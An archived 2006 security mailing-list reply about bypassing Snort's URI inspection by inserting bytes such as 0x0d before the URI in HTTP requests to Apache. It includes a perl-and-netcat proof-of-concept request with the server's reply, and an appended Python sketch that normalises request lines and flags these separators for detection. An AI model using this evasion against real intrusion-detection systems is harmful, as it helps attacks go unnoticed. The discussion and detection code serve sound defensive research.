[Dailydave] Re: New Snort Bypass - Patch - Bypass of Patch
From: Sigint Consulting (info sigint-consulting.com)
Date: Mon Jun 05 2006 - 13:50:18 CDT
>Apache 2 ignores any combination of the following bytes before the URI:
>0x09 0x0b 0x0c 0x0d 0x20 (man isspace)
>If you specify 0x0a before the URI, it causes Apache to truncate the
>request, so in most cases this results in the index.html page being
>returned. Try your 0x0a example again with a non-index.html URI and it
>will still serve up the main page.
HD,
You are correct, the request using \x0a is truncated and index.html is
returned, my apologies. However, the \x0d character is still accepted
and the proper page is returned. I cannot confirm on anything except
Apache 1.3.34 at the moment.
$ perl -e 'print "GET \x0d/html/1.html HTTP/1.0\n\r\n"'|nc 192.168.1.3 80
HTTP/1.1 200 OK
Date: Wed, 07 Jun 2006 08:42:53 GMT
Server: Apache/1.3.34 (Debian)
Last-Modified: Wed, 07 Jun 2006 08:42:37 GMT
ETag: "6f648-16-4486917d"
Accept-Ranges: bytes
Content-Length: 22
Connection: close
Content-Type: text/html; charset=iso-8859-1
this is a test 1.html
Chris
--------------------------------
www.sigint-consulting.com
info
sigint-consulting.com
Charlotte, North Carolina
Information Security Consulting
--------------------------------
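
The parsing mismatch discussed in this thread, as an added example (not code from the original posts): a Python sketch that extracts the URI from a request line the way the thread describes the server treating it, next to a naive single-space split of the kind a byte-pattern rule assumes. The function names and flag strings are hypothetical, the sample request lines are constructed from the bytes quoted above, and the tolerant parse models the behaviour reported in the thread, not Apache's actual parser.

```python
import re

# Separator bytes the thread reports as accepted before the URI:
# 0x09 0x0b 0x0c 0x0d 0x20. LF (0x0a) is excluded because it ends the line.
_REQ = re.compile(rb"([A-Za-z]+)([\t\x0b\x0c\r ]+)(\S*)")


def inspect_request_line(raw: bytes) -> dict:
    """Return the URI a tolerant server would act on, plus anomaly flags."""
    # Everything after the first LF is not part of the request line.
    line = raw.split(b"\n", 1)[0].rstrip(b"\r")
    m = _REQ.match(line)
    if m is None:
        return {"method": None, "uri": None, "flags": ["unparseable"]}
    method, sep, uri = m.groups()
    flags = []
    if sep != b" ":
        # Anything other than exactly one SP between method and URI.
        flags.append("nonstandard-separator")
    if uri == b"":
        # The line ended before a URI appeared (the 0x0a case in the thread).
        flags.append("truncated-request-line")
    return {"method": method.decode(), "uri": uri.decode("latin-1"), "flags": flags}


def naive_uri(raw: bytes) -> bytes:
    """Extraction that assumes exactly one SP after the method."""
    parts = raw.split(b" ")
    return parts[1] if len(parts) > 1 else b""


# Constructed sample request lines (not captured traffic).
SAMPLES = [
    b"GET /html/1.html HTTP/1.0\r\n\r\n",      # well-formed
    b"GET \x0d/html/1.html HTTP/1.0\n\r\n",    # CR before the URI
    b"GET \x0a/html/1.html HTTP/1.0\n\r\n",    # LF before the URI
    b"GET\t \x0b/html/1.html HTTP/1.0\r\n",    # mixed separator bytes
]

if __name__ == "__main__":
    for raw in SAMPLES:
        seen = inspect_request_line(raw)
        print(repr(naive_uri(raw)), "->", seen["uri"], seen["flags"])
```

A rule that matches URI content should run against the normalised `uri` value, with the flags raised as separate protocol-anomaly events.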